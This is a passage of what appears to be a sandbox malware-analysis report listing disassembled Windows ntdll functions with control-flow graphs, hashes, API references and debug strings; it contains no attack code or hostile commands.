                                                  • Opcode ID: 1299d1b0abe5e6765acaae19146a266e1054873fa348fd2d3137a91461fbf6c4
                                                  • Instruction ID: 5e892e7fea04ababc6e0fb2d6b5f787de2c6abe350e8dbf76af40d3d3420756d
                                                  • Opcode Fuzzy Hash: 1299d1b0abe5e6765acaae19146a266e1054873fa348fd2d3137a91461fbf6c4
                                                  • Instruction Fuzzy Hash: A0513879E00745AEEB20DF5ECC8087FBBF8EB44248B50845AE4D5C3685DA74DA08CF65
                                                  Function 36E2A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1427 36e2a670-36e2a6e9 call 36d62410 * 2 RtlDebugPrintTimes 1433 36e2a89f-36e2a8c4 call 36d625b0 * 2 call 36d94c30 1427->1433 1434 36e2a6ef-36e2a6fa 1427->1434 1436 36e2a724 1434->1436 1437 36e2a6fc-36e2a709 1434->1437 1441 36e2a728-36e2a734 1436->1441 1439 36e2a70b-36e2a70d 1437->1439 1440 36e2a70f-36e2a715 1437->1440 1439->1440 1443 36e2a7f3-36e2a7f5 1440->1443 1444 36e2a71b-36e2a722 1440->1444 1445 36e2a741-36e2a743 1441->1445 1446 36e2a81f-36e2a821 1443->1446 1444->1441 1447 36e2a736-36e2a73c 1445->1447 1448 36e2a745-36e2a747 1445->1448 1450 36e2a827-36e2a834 1446->1450 1451 36e2a755-36e2a77d RtlDebugPrintTimes 1446->1451 1453 36e2a73e 1447->1453 1454 36e2a74c-36e2a750 1447->1454 1448->1446 1456 36e2a836-36e2a843 1450->1456 1457 36e2a85a-36e2a866 1450->1457 1451->1433 1465 36e2a783-36e2a7a0 RtlDebugPrintTimes 1451->1465 1453->1445 1455 36e2a86c-36e2a86e 1454->1455 1455->1446 1460 36e2a845-36e2a849 1456->1460 1461 36e2a84b-36e2a851 1456->1461 1462 36e2a87b-36e2a87d 1457->1462 1460->1461 1466 36e2a857 1461->1466 1467 36e2a96b-36e2a96d 1461->1467 1463 36e2a870-36e2a876 1462->1463 1464 36e2a87f-36e2a881 1462->1464 1469 36e2a8c7-36e2a8cb 1463->1469 1470 36e2a878 1463->1470 1468 36e2a883-36e2a889 1464->1468 1465->1433 1475 36e2a7a6-36e2a7cc RtlDebugPrintTimes 1465->1475 1466->1457 1467->1468 1471 36e2a8d0-36e2a8f4 RtlDebugPrintTimes 1468->1471 1472 36e2a88b-36e2a89d RtlDebugPrintTimes 1468->1472 1474 36e2a99f-36e2a9a1 1469->1474 1470->1462 1471->1433 1478 36e2a8f6-36e2a913 RtlDebugPrintTimes 1471->1478 1472->1433 1475->1433 1480 36e2a7d2-36e2a7d4 1475->1480 1478->1433 1485 36e2a915-36e2a944 RtlDebugPrintTimes 1478->1485 1482 36e2a7d6-36e2a7e3 1480->1482 1483 36e2a7f7-36e2a80a 1480->1483 1486 36e2a7e5-36e2a7e9 1482->1486 1487 36e2a7eb-36e2a7f1 1482->1487 1484 36e2a817-36e2a819 1483->1484 1488 36e2a81b-36e2a81d 1484->1488 1489 36e2a80c-36e2a812 1484->1489 1485->1433 1493 36e2a94a-36e2a94c 1485->1493 1486->1487 1487->1443 1487->1483 1488->1446 1490 36e2a814 1489->1490 1491 36e2a868-36e2a86a 1489->1491 1490->1484 1491->1455 1494 36e2a972-36e2a985 1493->1494 1495 36e2a94e-36e2a95b 1493->1495 1498 36e2a992-36e2a994 1494->1498 1496 36e2a963-36e2a969 1495->1496 1497 36e2a95d-36e2a961 1495->1497 1496->1467 1496->1494 1497->1496 1499 36e2a996 1498->1499 1500 36e2a987-36e2a98d 1498->1500 1499->1464 1501 36e2a99b-36e2a99d 1500->1501 1502 36e2a98f 1500->1502 1501->1474 1502->1498
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: 25ea101739cacb74cb723eb9b9ea0bb0990a5eeee519a2f7e4ff3520d0e36815
                                                  • Instruction ID: 250d915cd5cf80587f01ad9d8676189ae46b0764f899a8c2dbaea6be55c29f34
                                                  • Opcode Fuzzy Hash: 25ea101739cacb74cb723eb9b9ea0bb0990a5eeee519a2f7e4ff3520d0e36815
                                                  • Instruction Fuzzy Hash: 2CA1DF75A043128FE708DF29C894A1AB7E6FF88354F19456DE945DB350EBB0EC0ACB91
                                                  Function 36D87630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1503 36d87630-36d87651 1504 36d8768b-36d87699 call 36d94c30 1503->1504 1505 36d87653-36d8766f call 36d5e660 1503->1505 1510 36dc4638 1505->1510 1511 36d87675-36d87682 1505->1511 1515 36dc463f-36dc4645 1510->1515 1512 36d8769a-36d876a9 call 36d87818 1511->1512 1513 36d87684 1511->1513 1519 36d876ab-36d876c1 call 36d877cd 1512->1519 1520 36d87701-36d8770a 1512->1520 1513->1504 1517 36dc464b-36dc46b8 call 36ddf290 call 36d99020 RtlDebugPrintTimes BaseQueryModuleData 1515->1517 1518 36d876c7-36d876d0 call 36d87728 1515->1518 1517->1518 1537 36dc46be-36dc46c6 1517->1537 1518->1520 1528 36d876d2 1518->1528 1519->1515 1519->1518 1523 36d876d8-36d876e1 1520->1523 1530 36d8770c-36d8770e 1523->1530 1531 36d876e3-36d876f2 call 36d8771b 1523->1531 1528->1523 1532 36d876f4-36d876f6 1530->1532 1531->1532 1535 36d876f8-36d876fa 1532->1535 1536 36d87710-36d87719 1532->1536 1535->1513 1539 36d876fc 1535->1539 1536->1535 1537->1518 1540 36dc46cc-36dc46d3 1537->1540 1542 36dc47be-36dc47d0 call 36d92c50 1539->1542 1540->1518 1541 36dc46d9-36dc46e4 1540->1541 1543 36dc47b9 call 36d94d48 1541->1543 1544 36dc46ea-36dc4723 call 36ddf290 call 36d9aaa0 1541->1544 1542->1513 1543->1542 1552 36dc473b-36dc476b call 36ddf290 1544->1552 1553 36dc4725-36dc4736 call 36ddf290 1544->1553 1552->1518 1558 36dc4771-36dc477f call 36d9a770 1552->1558 1553->1520 1561 36dc4786-36dc47a3 call 36ddf290 call 36dccf9e 1558->1561 1562 36dc4781-36dc4783 1558->1562 1561->1518 1567 36dc47a9-36dc47b2 1561->1567 1562->1561 1567->1558 1568 36dc47b4 1567->1568 1568->1518
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36DC4742
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36DC4725
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 36DC4787
                                                  • Execute=1, xrefs: 36DC4713
                                                  • ExecuteOptions, xrefs: 36DC46A0
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36DC4655
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36DC46FC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: cdf603a210481016bb8b278f7a993e0ace6554b337dc7cc2c6956371b5fc8bf8
                                                  • Instruction ID: 781bc76d07edcdcf1f582f9ef3c78756d7dd2df35a6ca96721b972b63f687135
                                                  • Opcode Fuzzy Hash: cdf603a210481016bb8b278f7a993e0ace6554b337dc7cc2c6956371b5fc8bf8
                                                  • Instruction Fuzzy Hash: 57511675E00229BAEB109BA5DC9DFEE7BB8EF44344F5400A9D505AB180EB709A45CFA1
                                                  Function 36D6A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB79FA
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB79D5
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36DB7AE6
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DB79D0, 36DB79F5
                                                  • Actx , xrefs: 36DB7A0C, 36DB7A73
                                                  • SsHd, xrefs: 36D6A3E4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: d8db947e479ec80ce24254e74fb7f8942329f951b825ff7eb8663359aef6e2b0
                                                  • Instruction ID: 5f250435902a5300cc4c1adf9f9a888f6f32a2decf187af3ae937023c23650fc
                                                  • Opcode Fuzzy Hash: d8db947e479ec80ce24254e74fb7f8942329f951b825ff7eb8663359aef6e2b0
                                                  • Instruction Fuzzy Hash: 7CE1A374B043018FE714CF66C894B5AB7E1BB8835CF98462DE8D68B290DBB1E945CB91
                                                  Function 36D6D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB936B
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB9346
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36DB9565
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DB9341, 36DB9366
                                                  • Actx , xrefs: 36DB9508
                                                  • GsHd, xrefs: 36D6D874
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 276ffd0fa8cac2f7573df99e1f1d955ec9c386cbde018f7a0be84463975993fa
                                                  • Instruction ID: 723ccd52425edf390f2d9635435b4f08e15b6068ab2420ffc2305f8ab98c5068
                                                  • Opcode Fuzzy Hash: 276ffd0fa8cac2f7573df99e1f1d955ec9c386cbde018f7a0be84463975993fa
                                                  • Instruction Fuzzy Hash: 10E1E574A043418FEB10CF26C890B5AB7F4BF8935CF94492EE896DB299C771D844CB92
                                                  Function 36D4645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 36D4656C
                                                    • Part of subcall function 36D465B5: RtlDebugPrintTimes.NTDLL ref: 36D46664
                                                    • Part of subcall function 36D465B5: RtlDebugPrintTimes.NTDLL ref: 36D466AF
                                                  Strings
                                                  • LdrpInitShimEngine, xrefs: 36DA99F4, 36DA9A07, 36DA9A30
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DA9A11, 36DA9A3A
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36DA99ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36DA9A01
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36DA9A2A
                                                  • apphelp.dll, xrefs: 36D46496
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: bb30c4f7aa16bab1dda22d8991e7460f298a4cb57db32d53c09d66ab7215498c
                                                  • Instruction ID: 4e56edbdf32ae814e181b05bec95e55edfc444350b02fa0634f1dd6583abcffd
                                                  • Opcode Fuzzy Hash: bb30c4f7aa16bab1dda22d8991e7460f298a4cb57db32d53c09d66ab7215498c
                                                  • Instruction Fuzzy Hash: 3C519E71A19344EFE311DF25CC40E5B77E5EB84648F50491AF596AB1A0DA30DD09CBA3
                                                  Function 36DCFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: bf01e085fddb3a232fcb4b5e8fc8183006f70fd8e3358da254d96daba867378f
                                                  • Instruction ID: 49377f83d96498aa0d30f1ac2d91960bdcf35b548e44e093145f58b4e0ec93e6
                                                  • Opcode Fuzzy Hash: bf01e085fddb3a232fcb4b5e8fc8183006f70fd8e3358da254d96daba867378f
                                                  • Instruction Fuzzy Hash: BD415FB9E0120DABDB01DFAAC980ADEBBB9FF48354F114159E904BB345D731D915CBA0
                                                  Function 36DFFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: feed57dbac3dad4e0aa5bd2fd48d8b021cbda8bcaad1c7094455b10993cc7361
                                                  • Instruction ID: 7aea8bfe0e248cc972f664bb37e4cc07a5c803f1942e8388a24af43e417ef9cf
                                                  • Opcode Fuzzy Hash: feed57dbac3dad4e0aa5bd2fd48d8b021cbda8bcaad1c7094455b10993cc7361
                                                  • Instruction Fuzzy Hash: 6F712271A25244EFDB02DFA9C8406ADFBF2FF49304F458049E544AF691CB36994ACFA0
                                                  Function 36D465B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DA9AC5, 36DA9B06
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DA9AF6
                                                  • LdrpLoadShimEngine, xrefs: 36DA9ABB, 36DA9AFC
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DA9AB4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 94241924372233fb8cb26e75e23d99c699a8e1b1b1e745888c8c6d4831dd1082
                                                  • Instruction ID: 271052b469bba1ec422757d7588b89028209b8bbe0535177f86918f85a13a4af
                                                  • Opcode Fuzzy Hash: 94241924372233fb8cb26e75e23d99c699a8e1b1b1e745888c8c6d4831dd1082
                                                  • Instruction Fuzzy Hash: 8A512332E153989FDB06EF79CC48A9D7BB2AB40304F100165E652BF285CB649C5ACBA1
                                                  Function 36D79803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: @36$LdrpUnloadNode$Unmapping DLL "%wZ"$df6@36@36$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-1025258580
                                                  • Opcode ID: 51810eff3827133ea074061a15cc34f27f56a6e888a11c1bffca12befe873bd0
                                                  • Instruction ID: 95394d4f2044d42f8568e26cf463ed9cf6cc17634b4d4454526f3a5db190ff5a
                                                  • Opcode Fuzzy Hash: 51810eff3827133ea074061a15cc34f27f56a6e888a11c1bffca12befe873bd0
                                                  • Instruction Fuzzy Hash: 6B513772A043029FE715DF35CC84B19BBA1BF94318F54066DE5969F294DB34E805CBA3
                                                  Function 36D7DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 7ea4361ab83214351ae6196d448c9c3694b8693759c48291e8bc06994e38ae92
                                                  • Instruction ID: 2b43a872a8cf7f3ea1d797a4cfd7351c8fb0e7411b80def82f9c15a2342701fc
                                                  • Opcode Fuzzy Hash: 7ea4361ab83214351ae6196d448c9c3694b8693759c48291e8bc06994e38ae92
                                                  • Instruction Fuzzy Hash: E9413875E10750EFEB12CF74C884B59B7B4EF45368F108169D8465B694CB38A885CBE2
                                                  Function 36D7DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: e223e39aefad7073db3a532857dabb0c0b9ec55e8f5ce1c2a3e8d2999bc0903f
                                                  • Instruction ID: 998a21b017a41013d2db49a61f3a3c64ca3ec9267528e86f8ba4b3edd62d5b91
                                                  • Opcode Fuzzy Hash: e223e39aefad7073db3a532857dabb0c0b9ec55e8f5ce1c2a3e8d2999bc0903f
                                                  • Instruction Fuzzy Hash: 8D312535915780EFEB22DB64C808F467BF8EF11754F044084E4425BA95CBB8E889CAA3
                                                  Function 36E26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction ID: 7f1bc733c1f47465e1c0e669870ef44dd65e63108c3d2038d95ae9ca7d724f91
                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction Fuzzy Hash: 940226B5508341AFD705DF29C890A6BBBF6EFC8744F508A2DF9884B254DB31E909CB52
                                                  Function 36D9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction ID: be6e872b9fd9022423467a4923606dba5a1d8d3c1635ba4a8a81cb8447c2a142
                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction Fuzzy Hash: D981D578E153599EEF04CF69C8917EFBBF1AF45354F564219D850AB2D0C7349840CBA1
                                                  Function 36D59126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 8567c2df96f1940e1e89c2e3744ff33ac31ee4d06c5b50ff96e0e3da01ba95cb
                                                  • Instruction ID: bc0cfc72d73c1b402cdad241f9db55e69694c71f6616fb63d6cef603135b14a9
                                                  • Opcode Fuzzy Hash: 8567c2df96f1940e1e89c2e3744ff33ac31ee4d06c5b50ff96e0e3da01ba95cb
                                                  • Instruction Fuzzy Hash: B4816DB6D002699BDB21CF54CC44BEEB7B8AF08754F0141DAEA0AB7640D7309E85CFA5
                                                  Function 36D84D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 36DC3640, 36DC366C
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36DC362F
                                                  • LdrpFindDllActivationContext, xrefs: 36DC3636, 36DC3662
